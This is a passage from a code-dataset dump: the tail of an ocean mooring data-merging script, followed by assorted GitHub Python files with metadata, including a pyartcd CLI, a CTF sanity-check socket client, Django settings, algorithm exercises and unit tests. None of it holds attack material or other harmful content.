sal_mdiff_int['from200']=hstack((sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:9],sal_mdiff_fill_200[1:-1],sal_mdiff['from200'][:2]))

# Plot the difference between 50db instrument temp and sal with the two other instruments.
def plot_saltmp_diff():
    f,[ax1,ax2]=subplots(2,1,figsize=(12,10),sharex=True)
    plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100),'C0','50m-100m')
    ax1.plot(mtime,sal_mdiff_int['from100'],'o-',color='C0')
    plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200),'C1','50m-200m')
    ax1.plot(mtime,sal_mdiff_int['from200'],'o-',color='C1')
    plot_diff_manyways(ax1,dat18.PSAL.sel(DEPTH=100)-dat18.PSAL.sel(DEPTH=200),'C2','100m-200m')
    ax1.axhline(0,color='k')
    ax1.legend()
    ax1.set_ylabel('salinity difference')
    plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100),'C0','50m-100m')
    plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200),'C1','50m-200m')
    plot_diff_manyways(ax2,dat18.PTMP.sel(DEPTH=100)-dat18.PTMP.sel(DEPTH=200),'C2','100m-200m')
    ax2.axhline(0,color='k')
    ax2.set_ylabel('temperature difference')

plot_saltmp_diff()
savefig(figdir+'merging_overview/CF1_saltmpdiff.png')

ptmp_r50={}
ptmp_r50['from100']=dat18.PTMP.sel(DEPTH=100)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=100))
ptmp_r50['from200']=dat18.PTMP.sel(DEPTH=200)+mean(dat18.PTMP.sel(DEPTH=50)-dat18.PTMP.sel(DEPTH=200))


def toTimestamp(d):
    return calendar.timegm(d.timetuple())


def to_datetime_andordinal(date):
    """
    Converts a numpy datetime64 object to a python datetime object
    Input:
      date - a np.datetime64 object
    Output:
      DATE - a python datetime object
    """
    timestamp = ((date - np.datetime64('1970-01-01T00:00:00'))
                 / np.timedelta64(1, 's'))
    dtimeobj=datetime.datetime.utcfromtimestamp(timestamp)
    return datetime.datetime.toordinal(dtimeobj)


time_month=[to_datetime_andordinal(ddd) for ddd in mtime.values]
time_all=[to_datetime_andordinal(ddd) for ddd in dat18.TIME.values]

f100=interp1d(time_month,sal_mdiff_int['from100'],bounds_error=False)
f200=interp1d(time_month,sal_mdiff_int['from200'],bounds_error=False)

sal_mdiff_fulltime={}
sal_mdiff_fulltime['from100']=f100(time_all)
sal_mdiff_fulltime['from200']=f200(time_all)

psal_r50={}
psal_r50['from100']=dat18.PSAL.sel(DEPTH=100)+sal_mdiff_fulltime['from100']
psal_r50['from200']=dat18.PSAL.sel(DEPTH=200)+sal_mdiff_fulltime['from200']


def comp_from100200():
    f,[ax1,ax2]=subplots(2,1,figsize=(12,10))
    ptmp_r50['from100'].plot(ax=ax1,label='from 100m')
    ptmp_r50['from200'].plot(ax=ax1,label='from 200m')
    dat18.PTMP.sel(DEPTH=50).plot(ax=ax1,label='directly measured')
    ax1.legend()
    ax1.set_title('')
    psal_r50['from100'].plot(ax=ax2,label='from 100m')
    psal_r50['from200'].plot(ax=ax2,label='from 200m')
    dat18.PSAL.sel(DEPTH=50).plot(ax=ax2,label='directly measured')
    ax2.set_title('')

comp_from100200()

###############################################################################
##### Save a reconstructed product which keeps recorder 50m data
#### And adds the 100m reconstruction beyond that
#### This is simply because the 100m is present,closer and noisier
#### It wouldn't make sense for 50m instrument to have less variability
################################################################################

dat18_recon=dat18.copy()
dat18_recon['PSAL'].sel(DEPTH=50)[isnan(dat18['PSAL'].sel(DEPTH=50))]=psal_r50['from100'][isnan(dat18['PSAL'].sel(DEPTH=50))].values
dat18_recon['PTMP'].sel(DEPTH=50)[isnan(dat18['PTMP'].sel(DEPTH=50))]=ptmp_r50['from100'][isnan(dat18['PTMP'].sel(DEPTH=50))].values
dat18_recon['PRES'].sel(DEPTH=50)[isnan(dat18['PRES'].sel(DEPTH=50))]=mean(dat18['PRES'].sel(DEPTH=50))

plot(dat18_recon['PRES']);

plot_overview(dat16_recon,dat18_recon)
savefig(figdir+'merging_overview/CF1_overview_1618recon.png')

dat18_recon.to_netcdf(datadir+'OSNAP2018recovery/mcat_nc/CF1_mcat_recon_2018recovery_daily.nc','w',format='netCDF4')
```
**Row 11 — `gabemontero/aos-cd-jobs` · `/pyartcd/pyartcd/cli.py` · branch refs/heads/master**

- ids: blob 0564a1a72dcfd96a4e5f97d467c399d260cf2044 · directory 6ba8a0ebb55fee0406da9e4c6784def6391cf61b · content 62569db660eb11953ff60867489214cead41a104 · snapshot a354d680250bf306a90a24ec5023cf203658df59 · revision 0208570f5bf14d6f9672da84b0edb6cffaaded92
- license: detected ["Apache-2.0"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 2,047 · is_vendor false · is_generated false
- dates: visit 2021-09-28T04:57:13.789002 · revision 2021-09-21T09:18:05 · committer 2021-09-21T09:18:05 · gha_event_created_at 2017-07-10T17:17:20 · gha_created_at 2017-07-10T17:17:20
- github: id 96,802,806 · stars 0 · forks 0
- authors: ["yuxzhu@redhat.com"] · author_id: yuxzhu@redhat.com

content:

```python
import asyncio
from functools import update_wrapper
import logging
from pathlib import Path
from typing import Optional

import click

from pyartcd.runtime import Runtime

pass_runtime = click.make_pass_decorator(Runtime)


def click_coroutine(f):
    """ A wrapper to allow to use asyncio with click.
    https://github.com/pallets/click/issues/85
    """
    f = asyncio.coroutine(f)

    def wrapper(*args, **kwargs):
        loop = asyncio.get_event_loop()
        return loop.run_until_complete(f(*args, **kwargs))
    return update_wrapper(wrapper, f)


# ============================================================================
# GLOBAL OPTIONS: parameters for all commands
# ============================================================================
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.option("--config", "-c", metavar='PATH',
              help="Configuration file ('~/.config/artcd.toml' by default)")
@click.option("--working-dir", "-C", metavar='PATH', default=None,
              help="Existing directory in which file operations should be performed (current directory by default)")
@click.option("--dry-run", is_flag=True,
              help="don't actually execute the pipeline; just print what would be done")
@click.option("--verbosity", "-v", count=True,
              help="[MULTIPLE] increase output verbosity")
@click.pass_context
def cli(ctx: click.Context, config: Optional[str], working_dir: Optional[str], dry_run: bool, verbosity: int):
    config_filename = config or Path("~/.config/artcd.toml").expanduser()
    working_dir = working_dir or Path.cwd()
    # configure logging
    if not verbosity:
        logging.basicConfig(level=logging.WARNING)
    elif verbosity == 1:
        logging.basicConfig(level=logging.INFO)
    elif verbosity >= 2:
        logging.basicConfig(level=logging.DEBUG)
    else:
        raise ValueError(f"Invalid verbosity {verbosity}")
    ctx.obj = Runtime.from_config_file(config_filename, working_dir=Path(working_dir), dry_run=dry_run)
```
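A sketch of how an async subcommand might attach to this group. The `hello` command is hypothetical, and it assumes `Runtime` exposes the `dry_run` it was constructed with; `pass_runtime` injects `ctx.obj` and `click_coroutine` (applied innermost) bridges the coroutine into click's synchronous call:

```python
@cli.command("hello")  # hypothetical subcommand for illustration
@click.option("--name", default="world")
@pass_runtime
@click_coroutine
async def hello(runtime: Runtime, name: str):
    # runtime comes from ctx.obj (set in cli()); the coroutine body runs
    # inside loop.run_until_complete via the click_coroutine wrapper.
    print(f"hello {name} (dry_run={runtime.dry_run})")
```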
**Row 12 — `jchen8tw-research/CTF` · `/Games/DagwCTF2020/TakeItBackNow/client0.py` · branch refs/heads/master**

- ids: blob 433aa413dbbf3fa57c5763bd7eb0530e55be08f0 · directory 830465731dfda87b4141546262f20d74c29297bf · content 3e577c3492467502cc615738464b2bae91453420 · snapshot f559d7ca0e16a730335b11caeeae208c42e8bf17 · revision f49615c24437a9cc6a2c20d6b30cb5abf7a32b71
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 646 · is_vendor false · is_generated false
- dates: visit 2023-03-17T12:29:08.630613 · revision 2021-03-23T06:31:26 · committer 2021-03-23T06:31:26 · gha_event_created_at null · gha_created_at null
- github: id null · stars 0 · forks 0
- authors: ["cpr1014@gmail.com"] · author_id: cpr1014@gmail.com

content:

```python
# -*- coding: utf-8 -*-
"""
Created for Spring 2020 CTF
Cryptography 0
10 Points

Welcome to my sanity check. You'll find this to be fairly easy.
The oracle is found at umbccd.io:13370, and your methods are:

    flg - returns the flag
    tst - returns the message after the : in "tst:..."

@author: pleoxconfusa
"""

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('crypto.ctf.umbccd.io', 13370)
sock.connect(server_address)

# available methods: flg, tst.
msg = 'tst:hello'
sock.sendall(msg.encode())
data = sock.recv(1024)
print(data.decode())

sock.close()
```
**Row 13 — `loogica/tachovendo_backend` · `/tachovendo_proj/settings/base.py` · branch refs/heads/master**

- ids: blob b542e098a92e72342cb38640aacc06125c27de7f · directory 998610ed0b370c5beb73d908164d07f6f9a692ab · content 2eeb26e276275d69531b6b692436f73ad4a6f279 · snapshot d372f0032cc5ab02883c433cc2ed36467adf85c9 · revision 4333a55716df31897eeecb84ffa019456336e010
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 8,111 · is_vendor false · is_generated false
- dates: visit 2016-09-06T08:06:07.003269 · revision 2013-06-04T01:03:36 · committer 2013-06-04T01:03:36 · gha_event_created_at null · gha_created_at null
- github: id null · stars 0 · forks 0
- authors: ["felipecruz@loogica.net"] · author_id: felipecruz@loogica.net

content:

```python
# coding: utf-8
"""Common settings and globals."""

import os
from os.path import abspath, basename, dirname, join, normpath
from sys import argv, path

from unipath import Path

########## PATH CONFIGURATION
# Absolute filesystem path to the Django project directory:
DJANGO_ROOT = dirname(dirname(abspath(__file__)))

PROJECT_ROOT = Path(__file__).ancestor(3)

# Absolute filesystem path to the top-level project folder:
SITE_ROOT = dirname(DJANGO_ROOT)

# Site name:
SITE_NAME = basename(DJANGO_ROOT)

# Add our project to our pythonpath, this way we don't need to type our project
# name in our dotted import paths:
path.append(DJANGO_ROOT)
########## END PATH CONFIGURATION

########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False

# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION

########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
    ('you', 'your@email.com'),
)

# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION

########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': '',
        'USER': '',
        'PASSWORD': '',
        'HOST': '',
        'PORT': '',
    }
}
########## END DATABASE CONFIGURATION

########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Sao_Paulo'

# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'

gettext = lambda s: s
LANGUAGES = (
    ('pt', gettext('Português')),
    ('en', gettext('English')),
)

# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1

# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True

# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True

# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True

LOCALE_PATHS = normpath(join(DJANGO_ROOT, 'locale'))
########## END GENERAL CONFIGURATION

########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = normpath(join(DJANGO_ROOT, 'media'))

# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION

########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = normpath(join(DJANGO_ROOT, 'assets'))

# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'

# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
    normpath(join(DJANGO_ROOT, 'static')),
)

# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION

########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = r"$&jkf@shv+tec-uz_t5qz0u7nxrp%2b4v!9ym3rqd!=mmy-7+*"
########## END SECRET CONFIGURATION

########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
    normpath(join(SITE_ROOT, 'fixtures')),
)
########## END FIXTURE CONFIGURATION

########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
    'django.contrib.auth.context_processors.auth',
    'django.core.context_processors.debug',
    'django.core.context_processors.i18n',
    'django.core.context_processors.media',
    'django.core.context_processors.static',
    'django.core.context_processors.tz',
    'django.contrib.messages.context_processors.messages',
    'django.core.context_processors.request',
)

# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
)

# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
    normpath(join(DJANGO_ROOT, 'templates')),
)
########## END TEMPLATE CONFIGURATION

########## MIDDLEWARE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#middleware-classes
MIDDLEWARE_CLASSES = (
    # Default Django middleware.
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)
########## END MIDDLEWARE CONFIGURATION

########## URL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = '%s.urls' % SITE_NAME
########## END URL CONFIGURATION

# Auth views Config
LOGIN_URL = "/login"
LOGIN_REDIRECT_URL = "/"
# End

########## APP CONFIGURATION
DJANGO_APPS = (
    # Default Django apps:
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Useful template tags:
    # 'django.contrib.humanize',
    'django.contrib.admin',
)

THIRD_PARTY_APPS = (
    # Database migration helpers:
    'south',
    'widget_tweaks',
)

# Apps specific for this project go here.
LOCAL_APPS = (
    'tachovendo',
)

# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
########## END APP CONFIGURATION

########## RIOAPPS KEY CONFIG
APP_ID = os.environ.get('RIOAPPS_APP_ID')
APP_SECRET = os.environ.get('RIOAPPS_APP_SECRET')
########## END RIOAPPS KEYS CONFIG

########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'null': {
            'level': 'DEBUG',
            'class': 'django.utils.log.NullHandler',
        },
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        },
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
        'events.views': {
            'handlers': ['console'],
            'level': 'INFO',
            'propagate': True,
        },
    }
}
########## END LOGGING CONFIGURATION

########## WSGI CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'wsgi.application'
########## END WSGI CONFIGURATION
```
**Row 14 — `TERADA-DANTE/algorithm` · `/python/acmicpc/unsolved/8984.py` · branch refs/heads/master**

- ids: blob 2b17d640e22b95cc5a61021381c03af14f83aee7 · directory a30362e51cb3291daf26d0c62e56c42caeec837f · content e9fc6b9f6e862ee51d73a36e02a12d6bc484c6b5 · snapshot 03bf52764c6fcdb93d7c8a0ed7a672834f488412 · revision 20bdfa1a5a6b9c378e588b17073e77a0126f7339
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 210 · is_vendor false · is_generated false
- dates: visit 2023-04-14T21:40:11.250022 · revision 2023-04-12T13:00:37 · committer 2023-04-12T13:00:37 · gha_event_created_at null · gha_created_at null
- github: id 288,335,057 · stars 0 · forks 0
- authors: ["55175301+TERADA-DANTE@users.noreply.github.com"] · author_id: 55175301+TERADA-DANTE@users.noreply.github.com

content (an unsolved stub; `solution` just echoes its inputs):

```python
import sys

input = sys.stdin.readline

n, l = list(map(int, input().split()))
lines = [list(map(int, input().split())) for _ in range(n)]


def solution(n, l, lines):
    return n, l, lines


print(n, l, lines)
```
**Row 15 — `sangha0719/py-practice` · `/.history/class맴버변수_20200708170750.py` · branch refs/heads/master**

- ids: blob 3f14475e0c2863c12b7447c7a82f14ad759b824e · directory a140fe192fd643ce556fa34bf2f84ddbdb97f091 · content 62351d8c9312e58d87ab4c22a5685c88c76c9c41 · snapshot 826f13cb422ef43992a69f822b9f04c2cb6d4815 · revision 6d71ce64bf91cc3bccee81378577d84ba9d9c121
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 374 · is_vendor false · is_generated false
- dates: visit 2023-03-13T04:40:55.883279 · revision 2021-02-25T12:02:04 · committer 2021-02-25T12:02:04 · gha_event_created_at null · gha_created_at null
- github: id 342,230,484 · stars 0 · forks 0
- authors: ["sangha0719@gmail.com"] · author_id: sangha0719@gmail.com

content (comment translated from Korean; the user-facing print strings are left as-is):

```python
class Unit:
    def __init__(self, name, hp, damage):
        self.name = name
        self.hp = hp
        self.damage = damage
        print("{0} 유닛이 생성 되었습니다.".format(self.name))
        print("체력 {0}, 공격력 {1}".format(self.hp, self.damage))


# Wraith: air unit, aircraft, cloaking (invisible to the opponent)
# (note: this binds the class itself rather than an instance; the file
# is a mid-edit .history snapshot)
wraith = Unit
```
**Row 16 — `AdamZhouSE/pythonHomework` · `/Code/CodeRecords/2950/60632/269982.py` · branch refs/heads/master**

- ids: blob 76c6674b3a2fb4f35bd3276d78443a663070b14f · directory 163bbb4e0920dedd5941e3edfb2d8706ba75627d · content e99e3be7a8277b32c3e022c23301da28661ec71a · snapshot a25c120b03a158d60aaa9fdc5fb203b1bb377a19 · revision ffc5606817a666aa6241cfab27364326f5c066ff
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 273 · is_vendor false · is_generated false
- dates: visit 2022-11-24T08:05:22.122011 · revision 2020-07-28T16:21:24 · committer 2020-07-28T16:21:24 · gha_event_created_at null · gha_created_at null
- github: id 259,576,640 · stars 2 · forks 1
- authors: ["1069583789@qq.com"] · author_id: 1069583789@qq.com

content:

```python
s = list(input())
if len(s) % 2 == 1:
    print(-1)
else:
    result = 0
    for i in range(len(s)):
        if s[:i].count('5') > s[:i].count('2'):
            result = -1
            break
    result = max(s[:1].count('2') - s[:1].count('5'), result)
    print(result)
```
**Row 17 — `gksrb2656/AlgoPractice` · `/이분탐색/입국심사.py` · branch refs/heads/master**

- ids: blob 54a8883bb18ba783ca7d90de1608b104223d1c3f · directory 30dbb8c5a5cce9dfea904924f00a1451abd0c88b · content d1b435138bd0d7498ccb48efc79bedafab3961ee · snapshot 7eac983509de4c5f047a880902253e477f4ca27c · revision 5285479625429b8ef46888c8611dc132924833b7
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 428 · is_vendor false · is_generated false
- dates: visit 2020-12-22T17:20:33.677147 · revision 2020-09-22T16:05:53 · committer 2020-09-22T16:05:53 · gha_event_created_at null · gha_created_at null
- github: id 236,872,750 · stars 0 · forks 0
- authors: ["rbcjswkd@gmail.com"] · author_id: rbcjswkd@gmail.com

content:

```python
def solution(n, times):
    l = 1
    r = max(times) * n
    answer = 0
    while l <= r:
        mid = (l + r) // 2
        flag = 0
        people = 0
        for t in times:
            people += mid // t
            if people >= n:
                flag = 1
                answer = mid
                break
        if flag:
            r = mid - 1
        else:
            l = mid + 1
    return answer


solution(6, [7, 10])
```
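This is a parametric (binary) search on the answer: a time `mid` is feasible when `sum(mid // t for t in times) >= n`, and the loop keeps the smallest feasible `mid`. A quick check of the example call (the expected value is mine, not from the source):

```python
assert solution(6, [7, 10]) == 28  # 28//7 + 28//10 = 4 + 2 = 6 people served
print(solution(6, [7, 10]))
```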
**Row 18 — `WithPrecedent/sourdough` · `/tests/test_mixins.py` · branch refs/heads/master**

- ids: blob 149a39da8051edd413bd0e53d557532e042ebf01 · directory fc6f0806292263bbfb2055587468df68ab6a950e · content dad5938477e9c873a7c71c6b6f343aff1a6fd7b9 · snapshot 8c0a5cff14c2257162fd1d66bf03a5a53f6a9571 · revision e42f81e5b27b067e13ff17338300e56c23ae4cad
- license: detected ["Apache-2.0"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 1,898 · is_vendor false · is_generated false
- dates: visit 2023-03-03T16:23:10.857530 · revision 2021-02-10T04:49:57 · committer 2021-02-10T04:49:57 · gha_event_created_at null · gha_created_at null
- github: id 261,512,460 · stars 0 · forks 0
- authors: ["coreyrayburnyung@gmail.com"] · author_id: coreyrayburnyung@gmail.com

content:

```python
"""
test_mixins: unit tests for Component mixins
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
"""

import dataclasses

import sourdough


@dataclasses.dataclass
class AComponent(
        sourdough.Bunch,
        sourdough.Registry,
        sourdough.quirks.Element):
    pass


@dataclasses.dataclass
class OtherComponent(AComponent):
    pass


@dataclasses.dataclass
class AnotherComponent(sourdough.Options, OtherComponent):
    options = sourdough.Catalog(contents = {
        'base': AComponent(),
        'other': OtherComponent()})


@dataclasses.dataclass
class ProxiedComponent(sourdough.Proxy, OtherComponent):

    def __post_init__(self):
        super().__post_init__()
        self._hidden_attribute = 'value'
        self.proxify(proxy = 'new_property', attribute = '_hidden_attribute')


def test_mixins():
    # Tests Component, Registry, and Bunch
    a_component = AComponent()
    other_component = OtherComponent()
    assert 'other_component' in AComponent.store
    assert 'other_component' in a_component.store
    assert 'other_component' in AComponent.store
    assert 'other_component' in a_component.store
    an_instance = a_component.instance(key = 'other_component', name = 'test')
    assert an_instance.name == 'test'
    another_instance = a_component.borrow(key = 'other_component')
    assert another_instance.name == 'other_component'
    # Tests Options
    another_component = AnotherComponent()
    base_instance = another_component.select(key = 'base')
    other_instance = another_component.select(key = 'other')
    assert other_instance.name == 'other_component'
    # Tests Proxy
    # proxied_component = ProxiedComponent()
    # assert proxied_component.new_property == 'value'
    return


if __name__ == '__main__':
    test_mixins()
```
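The `Registry` mixin itself is not shown. A minimal sketch of the behavior the test relies on — subclasses auto-registered under a snake_case key, with `borrow`/`instance` lookups — written from the assertions above rather than from the sourdough source:

```python
import dataclasses
import re


def _snake(name: str) -> str:
    # 'OtherComponent' -> 'other_component'
    return re.sub(r'(?<!^)(?=[A-Z])', '_', name).lower()


@dataclasses.dataclass
class MiniRegistry:
    name: str = None

    store = {}  # shared class-level catalog (not a dataclass field)

    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        MiniRegistry.store[_snake(cls.__name__)] = cls

    def borrow(self, key):
        # return an instance keyed by its registry name
        return self.store[key](name=key)

    def instance(self, key, **kwargs):
        return self.store[key](**kwargs)


@dataclasses.dataclass
class OtherComponent(MiniRegistry):
    pass


assert 'other_component' in MiniRegistry.store
assert MiniRegistry(name='base').borrow('other_component').name == 'other_component'
assert MiniRegistry(name='base').instance('other_component', name='test').name == 'test'
```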
**Row 19 — `wbkifun/my_stuff` · `/code_examples/PyKIM/util/convert_coord/test_cart_cs.py` · branch refs/heads/master**

- ids: blob 20878697ebaf854f56e4a45f312b2032fba93a2c · directory ef8c5c55b6ec3971adff9afe2db1f76556b87082 · content 73f53cd89f0df756db61dc64bfb03fbd2688b823 · snapshot 7007efc94b678234097abf0df9babfbd79dcf0ff · revision 0b5ad5d4d103fd05989b514bca0d5114691f8ff7
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 4,608 · is_vendor false · is_generated false
- dates: visit 2020-12-10T22:40:28.532993 · revision 2017-11-15T11:39:41 · committer 2017-11-15T11:39:41 · gha_event_created_at null · gha_created_at null
- github: id 5,178,225 · stars 1 · forks 0
- authors: ["kh.kim@kiaps.org"] · author_id: kh.kim@kiaps.org

content:

```python
import numpy as np
from numpy import pi, sin, cos, tan, sqrt
from numpy.random import rand, randint
from numpy.testing import assert_equal as equal
from numpy.testing import assert_array_equal as a_equal
from numpy.testing import assert_array_almost_equal as aa_equal
from nose.tools import raises, ok_

import sys
from os.path import abspath, dirname
current_dpath = dirname(abspath(__file__))
sys.path.append(current_dpath)


def test_xyp2xyz():
    '''
    xyp2xyz(): center of panel, at panel border
    '''
    from cart_cs import xyp2xyz

    R = 1
    a = R/sqrt(3)

    #------------------------------------------------
    # center of panel
    #------------------------------------------------
    x, y, panel = 0, 0, 1
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (1,0,0))

    x, y, panel = 0, 0, 2
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (0,1,0))

    x, y, panel = 0, 0, 3
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (-1,0,0))

    x, y, panel = 0, 0, 4
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (0,-1,0))

    x, y, panel = 0, 0, 5
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (0,0,-1))

    x, y, panel = 0, 0, 6
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (0,0,1))

    #------------------------------------------------
    # at the panel border
    #------------------------------------------------
    alpha = pi/4
    x, y, panel = a*tan(alpha), 0, 1
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (R*cos(alpha), R*sin(alpha), 0))

    x, y, panel = a*tan(alpha), 0, 2
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (-R*sin(alpha), R*cos(alpha), 0))

    x, y, panel = 0, -a*tan(alpha), 2
    (X, Y, Z) = xyp2xyz(x, y, panel)
    aa_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)), 15)

    x, y, panel = a*tan(alpha), 0, 3
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (-R*cos(alpha), -R*sin(alpha), 0))

    x, y, panel = a*tan(alpha), 0, 4
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (R*sin(alpha), -R*cos(alpha), 0))

    x, y, panel = a*tan(alpha), 0, 5
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)))

    x, y, panel = a*tan(alpha), 0, 6
    (X, Y, Z) = xyp2xyz(x, y, panel)
    a_equal((X,Y,Z), (0, R*sin(alpha), R*cos(alpha)))


def test_xyz2xyp():
    '''
    xyz2xyp(): center of panel, at panel border
    '''
    from cart_cs import xyz2xyp

    R = 1
    a = R/sqrt(3)

    #------------------------------------------------
    # center of panel
    #------------------------------------------------
    xyp_dict = xyz2xyp(1, 0, 0)
    a_equal(xyp_dict, {1:(0.0,0)})

    xyp_dict = xyz2xyp(0, 1, 0)
    a_equal(xyp_dict, {2:(0,0)})

    xyp_dict = xyz2xyp(-1, 0, 0)
    a_equal(xyp_dict, {3:(0,0)})

    xyp_dict = xyz2xyp(0, -1, 0)
    a_equal(xyp_dict, {4:(0,0)})

    xyp_dict = xyz2xyp(0, 0, -1)
    a_equal(xyp_dict, {5:(0,0)})

    xyp_dict = xyz2xyp(0, 0, 1)
    a_equal(xyp_dict, {6:(0,0)})

    #------------------------------------------------
    # at the panel border
    #------------------------------------------------
    alpha = pi/4
    at = a*tan(alpha)

